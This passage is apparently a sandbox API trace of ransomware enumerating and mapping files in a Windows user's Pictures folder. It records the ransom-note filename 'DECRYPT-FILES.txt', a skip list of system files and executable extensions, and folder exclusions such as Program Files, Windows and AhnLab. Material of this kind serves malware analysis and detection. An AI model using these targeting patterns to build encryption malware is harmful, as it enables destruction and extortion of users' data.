ftLastAccessTime.dwLowDateTime=0x6cf50020, ftLastAccessTime.dwHighDateTime=0x1d4d04a, ftLastWriteTime.dwLowDateTime=0xafea6a20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x7197, dwReserved0=0x0, dwReserved1=0x0, cFileName="qlMBzUqCsIPEZTD5JZK.bmp.SgR63W", cAlternateFileName="QLMBZU~1.SGR")) returned 1 [0186.094] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp.SgR63W", lpString2="DECRYPT-FILES.txt") returned 1 [0186.094] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp.SgR63W", lpString2="autorun.inf") returned 1 [0186.094] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp.SgR63W", lpString2="boot.ini") returned 1 [0186.094] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp.SgR63W", lpString2="desktop.ini") returned 1 [0186.094] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp.SgR63W", lpString2="ntuser.dat") returned 1 [0186.094] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp.SgR63W", lpString2="iconcache.db") returned 1 [0186.094] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp.SgR63W", lpString2="bootsect.bak") returned 1 [0186.094] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp.SgR63W", lpString2="ntuser.dat.log") returned 1 [0186.094] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp.SgR63W", lpString2="thumbs.db") returned -1 [0186.094] lstrcmpiW (lpString1="qlMBzUqCsIPEZTD5JZK.bmp.SgR63W", lpString2="Bootfont.bin") returned 1 [0186.094] lstrlenW (lpString="qlMBzUqCsIPEZTD5JZK.bmp.SgR63W") returned 30 [0186.094] lstrcmpiW (lpString1="SgR63W", lpString2="lnk") returned 1 [0186.095] lstrcmpiW (lpString1="SgR63W", lpString2="exe") returned 1 [0186.095] lstrcmpiW (lpString1="SgR63W", lpString2="sys") returned -1 [0186.095] lstrcmpiW (lpString1="SgR63W", lpString2="dll") returned 1 [0186.095] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0186.095] lstrlenW (lpString="qlMBzUqCsIPEZTD5JZK.bmp.SgR63W") returned 30 [0186.095] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0186.095] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="qlMBzUqCsIPEZTD5JZK.bmp.SgR63W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\qlMBzUqCsIPEZTD5JZK.bmp.SgR63W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\qlMBzUqCsIPEZTD5JZK.bmp.SgR63W" [0186.095] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\qlMBzUqCsIPEZTD5JZK.bmp.SgR63W" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\qlmbzuqcsipeztd5jzk.bmp.sgr63w"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.095] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=29079) returned 1 [0186.095] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.095] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.096] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.096] CloseHandle (hObject=0x268) returned 1 [0186.096] CloseHandle (hObject=0x264) returned 1 [0186.096] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.096] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bed3560, ftCreationTime.dwHighDateTime=0x1d4c95f, ftLastAccessTime.dwLowDateTime=0xa3f7b660, ftLastAccessTime.dwHighDateTime=0x1d4caa2, ftLastWriteTime.dwLowDateTime=0xaff65100, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xad2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro76uYb3z.jpg.vzX7", cAlternateFileName="RO76UY~1.VZX")) returned 1 [0186.096] lstrcmpiW (lpString1="ro76uYb3z.jpg.vzX7", lpString2="DECRYPT-FILES.txt") returned 1 [0186.096] lstrcmpiW (lpString1="ro76uYb3z.jpg.vzX7", lpString2="autorun.inf") returned 1 [0186.097] lstrcmpiW (lpString1="ro76uYb3z.jpg.vzX7", lpString2="boot.ini") returned 1 [0186.097] lstrcmpiW (lpString1="ro76uYb3z.jpg.vzX7", lpString2="desktop.ini") returned 1 [0186.097] lstrcmpiW (lpString1="ro76uYb3z.jpg.vzX7", lpString2="ntuser.dat") returned 1 [0186.097] lstrcmpiW (lpString1="ro76uYb3z.jpg.vzX7", lpString2="iconcache.db") returned 1 [0186.097] lstrcmpiW (lpString1="ro76uYb3z.jpg.vzX7", lpString2="bootsect.bak") returned 1 [0186.097] lstrcmpiW (lpString1="ro76uYb3z.jpg.vzX7", lpString2="ntuser.dat.log") returned 1 [0186.097] lstrcmpiW (lpString1="ro76uYb3z.jpg.vzX7", lpString2="thumbs.db") returned -1 [0186.097] lstrcmpiW (lpString1="ro76uYb3z.jpg.vzX7", lpString2="Bootfont.bin") returned 1 [0186.097] lstrlenW (lpString="ro76uYb3z.jpg.vzX7") returned 18 [0186.097] lstrcmpiW (lpString1="vzX7", lpString2="lnk") returned 1 [0186.097] lstrcmpiW (lpString1="vzX7", lpString2="exe") returned 1 [0186.097] lstrcmpiW (lpString1="vzX7", lpString2="sys") returned 1 [0186.097] lstrcmpiW (lpString1="vzX7", lpString2="dll") returned 1 [0186.097] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0186.097] lstrlenW (lpString="ro76uYb3z.jpg.vzX7") returned 18 [0186.097] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0186.097] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="ro76uYb3z.jpg.vzX7" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\ro76uYb3z.jpg.vzX7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\ro76uYb3z.jpg.vzX7" [0186.097] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.097] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\ro76uYb3z.jpg.vzX7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\ro76uyb3z.jpg.vzx7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.098] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=44332) returned 1 [0186.098] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.098] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.098] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.098] CloseHandle (hObject=0x268) returned 1 [0186.098] CloseHandle (hObject=0x264) returned 1 [0186.098] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.099] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ab4f20, ftCreationTime.dwHighDateTime=0x1d4d52c, ftLastAccessTime.dwLowDateTime=0xdfcb7900, ftLastAccessTime.dwHighDateTime=0x1d4cd87, ftLastWriteTime.dwLowDateTime=0xb006faa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x75aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="UmDNBjx9-CEgQ.bmp.I1562Qs", cAlternateFileName="UMDNBJ~1.I15")) returned 1 [0186.099] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp.I1562Qs", lpString2="DECRYPT-FILES.txt") returned 1 [0186.099] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp.I1562Qs", lpString2="autorun.inf") returned 1 [0186.099] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp.I1562Qs", lpString2="boot.ini") returned 1 [0186.099] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp.I1562Qs", lpString2="desktop.ini") returned 1 [0186.099] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp.I1562Qs", lpString2="ntuser.dat") returned 1 [0186.099] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp.I1562Qs", lpString2="iconcache.db") returned 1 [0186.099] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp.I1562Qs", lpString2="bootsect.bak") returned 1 [0186.099] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp.I1562Qs", lpString2="ntuser.dat.log") returned 1 [0186.099] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp.I1562Qs", lpString2="thumbs.db") returned 1 [0186.099] lstrcmpiW (lpString1="UmDNBjx9-CEgQ.bmp.I1562Qs", lpString2="Bootfont.bin") returned 1 [0186.099] lstrlenW (lpString="UmDNBjx9-CEgQ.bmp.I1562Qs") returned 25 [0186.099] lstrcmpiW (lpString1="I1562Qs", lpString2="lnk") returned -1 [0186.099] lstrcmpiW (lpString1="I1562Qs", lpString2="exe") returned 1 [0186.099] lstrcmpiW (lpString1="I1562Qs", lpString2="sys") returned -1 [0186.099] lstrcmpiW (lpString1="I1562Qs", lpString2="dll") returned 1 [0186.099] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0186.099] lstrlenW (lpString="UmDNBjx9-CEgQ.bmp.I1562Qs") returned 25 [0186.099] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0186.099] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="UmDNBjx9-CEgQ.bmp.I1562Qs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UmDNBjx9-CEgQ.bmp.I1562Qs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UmDNBjx9-CEgQ.bmp.I1562Qs" [0186.099] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.099] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UmDNBjx9-CEgQ.bmp.I1562Qs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\umdnbjx9-cegq.bmp.i1562qs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.100] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=30122) returned 1 [0186.100] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.100] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.101] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.101] CloseHandle (hObject=0x268) returned 1 [0186.101] CloseHandle (hObject=0x264) returned 1 [0186.102] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.103] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83592950, ftCreationTime.dwHighDateTime=0x1d4cbfd, ftLastAccessTime.dwLowDateTime=0x8289450, ftLastAccessTime.dwHighDateTime=0x1d4d3dc, ftLastWriteTime.dwLowDateTime=0xb0095c00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xef10, dwReserved0=0x0, dwReserved1=0x0, cFileName="UT-SH4cQR9b.gif.bJqN", cAlternateFileName="UT-SH4~1.BJQ")) returned 1 [0186.103] lstrcmpiW (lpString1="UT-SH4cQR9b.gif.bJqN", lpString2="DECRYPT-FILES.txt") returned 1 [0186.103] lstrcmpiW (lpString1="UT-SH4cQR9b.gif.bJqN", lpString2="autorun.inf") returned 1 [0186.103] lstrcmpiW (lpString1="UT-SH4cQR9b.gif.bJqN", lpString2="boot.ini") returned 1 [0186.103] lstrcmpiW (lpString1="UT-SH4cQR9b.gif.bJqN", lpString2="desktop.ini") returned 1 [0186.103] lstrcmpiW (lpString1="UT-SH4cQR9b.gif.bJqN", lpString2="ntuser.dat") returned 1 [0186.103] lstrcmpiW (lpString1="UT-SH4cQR9b.gif.bJqN", lpString2="iconcache.db") returned 1 [0186.103] lstrcmpiW (lpString1="UT-SH4cQR9b.gif.bJqN", lpString2="bootsect.bak") returned 1 [0186.103] lstrcmpiW (lpString1="UT-SH4cQR9b.gif.bJqN", lpString2="ntuser.dat.log") returned 1 [0186.103] lstrcmpiW (lpString1="UT-SH4cQR9b.gif.bJqN", lpString2="thumbs.db") returned 1 [0186.103] lstrcmpiW (lpString1="UT-SH4cQR9b.gif.bJqN", lpString2="Bootfont.bin") returned 1 [0186.103] lstrlenW (lpString="UT-SH4cQR9b.gif.bJqN") returned 20 [0186.103] lstrcmpiW (lpString1="bJqN", lpString2="lnk") returned -1 [0186.103] lstrcmpiW (lpString1="bJqN", lpString2="exe") returned -1 [0186.103] lstrcmpiW (lpString1="bJqN", lpString2="sys") returned -1 [0186.103] lstrcmpiW (lpString1="bJqN", lpString2="dll") returned -1 [0186.103] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0186.103] lstrlenW (lpString="UT-SH4cQR9b.gif.bJqN") returned 20 [0186.103] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0186.103] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="UT-SH4cQR9b.gif.bJqN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UT-SH4cQR9b.gif.bJqN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UT-SH4cQR9b.gif.bJqN" [0186.103] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.103] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\UT-SH4cQR9b.gif.bJqN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\ut-sh4cqr9b.gif.bjqn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.104] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=61200) returned 1 [0186.104] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.104] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.146] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.146] CloseHandle (hObject=0x268) returned 1 [0186.146] CloseHandle (hObject=0x264) returned 1 [0186.146] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.146] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83592950, ftCreationTime.dwHighDateTime=0x1d4cbfd, ftLastAccessTime.dwLowDateTime=0x8289450, ftLastAccessTime.dwHighDateTime=0x1d4d3dc, ftLastWriteTime.dwLowDateTime=0xb0095c00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xef10, dwReserved0=0x0, dwReserved1=0x0, cFileName="UT-SH4cQR9b.gif.bJqN", cAlternateFileName="UT-SH4~1.BJQ")) returned 0 [0186.146] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0186.146] CloseHandle (hObject=0x25c) returned 1 [0186.149] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc5ab4d0, ftCreationTime.dwHighDateTime=0x1d4c6d4, ftLastAccessTime.dwLowDateTime=0x35cd44d0, ftLastAccessTime.dwHighDateTime=0x1d4d3c5, ftLastWriteTime.dwLowDateTime=0xb00e1ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1006, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zr3fqdEKfc.jpg.Qqz7Hy", cAlternateFileName="ZR3FQD~1.QQZ")) returned 1 [0186.149] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg.Qqz7Hy", lpString2="DECRYPT-FILES.txt") returned 1 [0186.149] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg.Qqz7Hy", lpString2="autorun.inf") returned 1 [0186.149] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg.Qqz7Hy", lpString2="boot.ini") returned 1 [0186.149] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg.Qqz7Hy", lpString2="desktop.ini") returned 1 [0186.149] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg.Qqz7Hy", lpString2="ntuser.dat") returned 1 [0186.149] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg.Qqz7Hy", lpString2="iconcache.db") returned 1 [0186.149] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg.Qqz7Hy", lpString2="bootsect.bak") returned 1 [0186.149] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg.Qqz7Hy", lpString2="ntuser.dat.log") returned 1 [0186.149] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg.Qqz7Hy", lpString2="thumbs.db") returned 1 [0186.149] lstrcmpiW (lpString1="Zr3fqdEKfc.jpg.Qqz7Hy", lpString2="Bootfont.bin") returned 1 [0186.149] lstrlenW (lpString="Zr3fqdEKfc.jpg.Qqz7Hy") returned 21 [0186.150] lstrcmpiW (lpString1="Qqz7Hy", lpString2="lnk") returned 1 [0186.150] lstrcmpiW (lpString1="Qqz7Hy", lpString2="exe") returned 1 [0186.150] lstrcmpiW (lpString1="Qqz7Hy", lpString2="sys") returned -1 [0186.150] lstrcmpiW (lpString1="Qqz7Hy", lpString2="dll") returned 1 [0186.150] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0186.150] lstrlenW (lpString="Zr3fqdEKfc.jpg.Qqz7Hy") returned 21 [0186.150] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0186.150] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="Zr3fqdEKfc.jpg.Qqz7Hy" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Zr3fqdEKfc.jpg.Qqz7Hy") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Zr3fqdEKfc.jpg.Qqz7Hy" [0186.150] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.150] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Zr3fqdEKfc.jpg.Qqz7Hy" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zr3fqdekfc.jpg.qqz7hy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.150] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=4102) returned 1 [0186.150] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.150] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.151] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.151] CloseHandle (hObject=0x260) returned 1 [0186.152] CloseHandle (hObject=0x25c) returned 1 [0186.152] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.152] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc5ab4d0, ftCreationTime.dwHighDateTime=0x1d4c6d4, ftLastAccessTime.dwLowDateTime=0x35cd44d0, ftLastAccessTime.dwHighDateTime=0x1d4d3c5, ftLastWriteTime.dwLowDateTime=0xb00e1ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1006, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zr3fqdEKfc.jpg.Qqz7Hy", cAlternateFileName="ZR3FQD~1.QQZ")) returned 0 [0186.152] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.152] CloseHandle (hObject=0x254) returned 1 [0186.152] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0186.152] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0186.152] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0186.152] lstrcatW (in: lpString1="PrintHood", lpString2="\\" | out: lpString1="PrintHood\\") returned="PrintHood\\" [0186.152] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="PrintHood\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\" [0186.152] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\Program Files") returned 0x0 [0186.152] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch=":\\Windows") returned 0x0 [0186.152] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\Games\\") returned 0x0 [0186.152] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.152] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.152] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.152] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.152] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.152] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\All Users") returned 0x0 [0186.152] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.153] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.153] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.153] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="AhnLab") returned 0x0 [0186.153] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.153] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned 40 [0186.153] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.153] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\\\0a16c9.tmp") returned 51 [0186.153] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.155] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned 40 [0186.155] lstrlenW 